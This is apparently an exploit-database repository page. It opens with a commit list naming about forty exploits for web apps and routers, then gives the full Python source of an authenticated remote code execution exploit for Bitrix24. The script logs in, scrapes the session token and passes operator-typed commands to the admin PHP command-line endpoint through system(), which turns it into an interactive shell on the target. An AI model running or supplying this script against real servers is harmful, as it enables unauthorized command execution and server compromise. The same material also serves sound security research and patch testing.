
42 changes to exploits/shellcodes UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path Wondershare Dr.Fone 11.4.10 - Insecure File Permissions ExifTool 12.23 - Arbitrary Code Execution Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) Akka HTTP 10.1.14 - Denial of Service USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor Bookeen Notea - Directory Traversal SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure DLINK DIR850 - Insecure Access Control DLINK DIR850 - Open Redirect Apache CouchDB 3.2.1 - Remote Code Execution (RCE) Tenda HG6 v3.3.0 - Remote Command Injection Google Chrome 78.0.3904.70 - Remote Code Execution PyScript - Read Remote Python Source Code DLINK DAP-1620 A1 v1.01 - Directory Traversal Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) ImpressCMS v1.4.4 - Unrestricted File Upload Microfinance Management System 1.0 - 'customer_number' SQLi WebTareas 2.4 - Blind SQLi (Authenticated) WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) Magento eCommerce CE v2.3.5-p2 - Blind SQLi Bitrix24 - Remote Code Execution (RCE) (Authenticated) CSZ CMS 1.3.0 - 'Multiple' Blind SQLi Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) e107 CMS v3.2.1 - Multiple Vulnerabilities Anuko Time Tracker - SQLi (Authenticated) TLR-2005KSH - Arbitrary File Upload Explore CMS 1.0 - SQL Injection Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS) Beehive Forum - Account Takeover MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Joomla Plugin SexyPolling 2.1.7 - SQLi WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
54 lines
No EOL
1.6 KiB
Python
Executable file
54 lines
No EOL
1.6 KiB
Python
Executable file
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
|
|
# Date: 4/22/2022
|
|
# Exploit Author: picaro_o
|
|
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
|
|
# Tested on: Linux os
|
|
|
|
#/usr/bin/env python
|
|
#Created by heinjame
|
|
|
|
|
|
import requests
|
|
import re
|
|
from bs4 import BeautifulSoup
|
|
import argparse,sys
|
|
|
|
user_agent = {'User-agent': 'HeinJame'}
|
|
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("host", help="Betrix URL")
|
|
parser.add_argument("uname", help="Bitrix Username")
|
|
parser.add_argument("pass", help="Bitrix Password")
|
|
pargs = parser.parse_args()
|
|
url = sys.argv[1]
|
|
username = sys.argv[2]
|
|
password = sys.argv[3]
|
|
|
|
inputcmd = input(">>")
|
|
s = requests.Session()
|
|
def login():
|
|
|
|
postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password}
|
|
r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata)
|
|
def getsessionid():
|
|
sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en",
|
|
headers = user_agent)
|
|
session = re.search(r"'bitrix_sessid':.*", sessionid.text)
|
|
extract = session.group(0).split(":")
|
|
realdata = extract[1].strip(" ")
|
|
realdata = realdata.replace("'","")
|
|
realdata = realdata.replace(",","")
|
|
return realdata
|
|
# print(r.text)
|
|
def cmdline(cmd,sessionid):
|
|
cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'}
|
|
usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers
|
|
= user_agent, data = cmdline)
|
|
soup = BeautifulSoup(usercmd.content,'html.parser')
|
|
cmd = soup.find('p').getText()
|
|
print(cmd.rstrip())
|
|
login()
|
|
sessionid = getsessionid()
|
|
while inputcmd != "exit":
|
|
cmdline(inputcmd,sessionid)
|
|
inputcmd = input(">>") |